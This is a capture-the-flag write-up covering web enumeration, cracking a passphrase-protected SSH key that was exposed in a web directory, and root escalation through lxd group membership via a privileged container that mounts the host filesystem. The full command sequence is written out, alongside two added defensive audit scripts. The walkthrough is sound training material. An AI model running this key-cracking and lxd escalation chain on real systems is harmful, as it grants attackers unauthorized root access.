Not too much to go on. Let's have a look at the website.
After looking around and clicking, there wasn't much to go on. However, looking at the page source, we find a name!
But, I'm not convinced that's all we need just yet. Let's run a feroxbuster and see if we can find something.
Nice! Uploads and Secret. Let's have a look.
Let's take a look at secret first.
SecretKey looks promising.
We got an SSH key. That can't be a bad thing. Before we try ssh'ing in, let's check out uploads also.
manifesto.txt gives us a little clip of the actual hacker manifesto.
Then a meme for meme.jpg lol. We can come back and check that if we need to. Not going to waste time on it unless we get stuck.
Let's check out the more interesting file in Uploads, dict.lst.
And now we have what looks like a password list we can use.
Alright let's try to put all this together and see what happens. We have a name, a password list and an ssh key. We should be good now.....hopefully
Let's grab that dict.lst first.
Okay, so when we try to log in as john with the SSH key we found, it asks us for a password (the key is passphrase-protected).
So, let's run ssh2john on our SSH key and see if we can then use john to crack the passphrase.
Once we have a hash for john to crack, we can then use the following command to crack the hash.
I just tried with john's standard dictionary and it cracked it very quickly. But it also worked with the supplied dict.
Now we should be able to log in via SSH with john's creds.
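The lesson from this part of the box is that a private key sitting in a web-served directory is already a finding, and a passphrase only helps if it is not in a wordlist. Below is an added example (mine, not from the original writeup) that a defender could run over a web root to spot exposed keys and tell whether each one is passphrase-protected: legacy PEM keys advertise encryption with a `Proc-Type: 4,ENCRYPTED` header, and OpenSSH-format keys carry the cipher name (`none` when unencrypted) in the `openssh-key-v1` header. The sample files, including the file names, are constructed here for the demo; the `SecretKey` blob is a header-only stand-in, not a real key.

```python
import base64
import os
import re
import struct

# Matches a PEM block and captures the label (e.g. "OPENSSH PRIVATE KEY",
# "RSA PRIVATE KEY") and everything between the BEGIN and END lines.
PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]*PRIVATE KEY)-----\s*(.*?)\s*-----END \1-----", re.S
)


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 length + bytes) at offset."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    return buf[off:off + n], off + n


def classify_private_key(text):
    """Return (kind, encrypted) for a private key found in text, else None.

    encrypted is True/False, or None when the blob is malformed.
    """
    m = PEM_RE.search(text)
    if not m:
        return None
    label, body = m.group(1), m.group(2)
    if label == "OPENSSH PRIVATE KEY":
        # New OpenSSH format: base64 of "openssh-key-v1\0", then the
        # cipher name, KDF name, KDF options and key count.
        try:
            raw = base64.b64decode("".join(body.split()), validate=True)
        except (ValueError, struct.error):
            return ("openssh", None)
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return ("openssh", None)
        cipher, _ = _read_string(raw, len(magic))
        return ("openssh", cipher != b"none")
    # Legacy PEM (RSA/DSA/EC): a passphrase is signalled by a Proc-Type header.
    return (label.lower(), "Proc-Type: 4,ENCRYPTED" in body)


def audit_files(files):
    """files: {path: text}. Return [(path, kind, encrypted)] for every key found."""
    findings = []
    for path, text in files.items():
        res = classify_private_key(text)
        if res is not None:
            findings.append((path, res[0], res[1]))
    return findings


def audit_directory(root):
    """Walk a real web root and audit every readable text file under it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    files[path] = fh.read()
            except OSError:
                continue
    return audit_files(files)


def _openssh_blob(cipher, kdf):
    """Constructed header-only openssh-key-v1 blob (no key material follows)."""
    blob = b"openssh-key-v1\x00"
    for s in (cipher, kdf, b""):          # ciphername, kdfname, kdfoptions
        blob += struct.pack(">I", len(s)) + s
    blob += struct.pack(">I", 1)          # number of keys
    b64 = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 +
            "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed sample web root: one passphrase-protected OpenSSH key, one
# unencrypted legacy PEM key with placeholder body, one harmless text file.
SAMPLE_WEBROOT = {
    "secret/SecretKey": _openssh_blob(b"aes256-ctr", b"bcrypt"),
    "uploads/old.pem": ("-----BEGIN RSA PRIVATE KEY-----\nQUJDREVGRw==\n"
                        "-----END RSA PRIVATE KEY-----\n"),
    "uploads/manifesto.txt": "Another one got caught today...\n",
}

if __name__ == "__main__":
    for path, kind, enc in audit_files(SAMPLE_WEBROOT):
        state = {True: "passphrase-protected", False: "UNENCRYPTED"}.get(enc, "unparseable")
        print(f"{path}: {kind} key exposed ({state})")
```

Run against a real tree with `audit_directory("/var/www/html")`; any hit at all is worth removing from the web root, and an `UNENCRYPTED` hit should be treated as a compromised key and rotated.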
And we are in!
We can now print out user.txt easily.
Now let's get root!
After looking around for a while and running linpeas, it looks like the best path to take is an lxc/lxd priv esc method.
We're going to follow the exploit from HackTricks step by step to hopefully get root.
Step 1: on our attack machine.
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
git clone https://github.com/lxc/distrobuilder
cd distrobuilder
make
Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
Create the Container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
Start a python3 server to serve up the created files (lxd.tar.xz and rootfs.squashfs)
python3 -m http.server 80
Step 2: on our target machine
Download the image files we just served (lxd.tar.xz and rootfs.squashfs) onto the target machine
Add the Image
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
View the new image
lxc image list
Create a Container and add root path
lxc init alpine privesc -c security.privileged=true --alias=alpine
Let's make sure it worked (lxc list)
Let's add the root path now
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Let's Execute the Container
lxc start privesc
lxc exec privesc /bin/sh
Now, let's run id and whoami
WE ARE ROOT!
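From the defender's side, the whole chain above needed just two things: a low-privilege user in the `lxd` group, and nothing stopping a privileged container from mounting the host's `/`. The added example below (mine, not from the writeup or HackTricks) audits both. It reads `/etc/group` for `lxd`/`lxc` members and inspects the JSON that `lxc list --format json` emits, flagging instances whose (profile-)expanded config has `security.privileged=true` or a disk device whose `source` is the host root. The `/etc/group` excerpt and the `lxc list` output are constructed inline for the demo; on a live host, `audit_live()` shells out to `lxc` if it is installed.

```python
import json
import shutil
import subprocess

# Constructed /etc/group excerpt: the low-priv user sits in the lxd group.
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:
lxd:x:115:john
"""

# Constructed `lxc list --format json` output: one container built the way the
# writeup does it (privileged + host / mounted at /mnt/root), one benign.
SAMPLE_LXC_LIST = json.dumps([
    {
        "name": "privesc",
        "status": "Running",
        "config": {"security.privileged": "true"},
        "expanded_config": {"security.privileged": "true", "image.os": "alpine"},
        "devices": {
            "host-root": {"type": "disk", "source": "/",
                          "path": "/mnt/root", "recursive": "true"},
        },
        "expanded_devices": {
            "host-root": {"type": "disk", "source": "/",
                          "path": "/mnt/root", "recursive": "true"},
            "root": {"type": "disk", "path": "/", "pool": "default"},
        },
    },
    {
        "name": "web",
        "status": "Running",
        "config": {},
        "expanded_config": {"image.os": "ubuntu"},
        "devices": {},
        "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}},
    },
])


def lxd_group_members(group_text):
    """Return the users listed in the lxd (or lxc) group of an /etc/group file."""
    members = []
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in ("lxd", "lxc"):
            members.extend(m for m in parts[3].split(",") if m)
    return members


def risky_containers(lxc_list_json):
    """Return [(name, [reasons])] for instances that can reach the host as root.

    Uses expanded_* (config plus applied profiles) when present, so a
    privileged setting inherited from a profile is not missed.
    """
    findings = []
    for inst in json.loads(lxc_list_json):
        config = inst.get("expanded_config") or inst.get("config") or {}
        devices = inst.get("expanded_devices") or inst.get("devices") or {}
        reasons = []
        if str(config.get("security.privileged", "")).lower() == "true":
            reasons.append("security.privileged=true")
        for dev_name, dev in devices.items():
            if dev.get("type") == "disk" and dev.get("source") == "/":
                reasons.append(f"disk device '{dev_name}' mounts host / at {dev.get('path')}")
        if reasons:
            findings.append((inst.get("name", "?"), reasons))
    return findings


def audit_live():
    """Run both checks on the current host; lxc output is skipped if absent."""
    with open("/etc/group") as fh:
        members = lxd_group_members(fh.read())
    containers = []
    if shutil.which("lxc"):
        out = subprocess.run(["lxc", "list", "--format", "json"],
                             capture_output=True, text=True, check=False)
        if out.returncode == 0:
            containers = risky_containers(out.stdout)
    return members, containers


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP_FILE))
    for name, reasons in risky_containers(SAMPLE_LXC_LIST):
        print(f"container {name}:")
        for r in reasons:
            print("  -", r)
```

Any non-admin in the `lxd` group is effectively root on that host, so the fix is to remove the membership (or move to LXD's restricted project/`security.privileged` controls) rather than to chase individual containers; the container check is mainly useful as a detection after the fact.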
We are inside the container with the host filesystem mounted at /mnt/root, so we have to do a little weird navigation here, but nothing too bad.
And we have our root flag!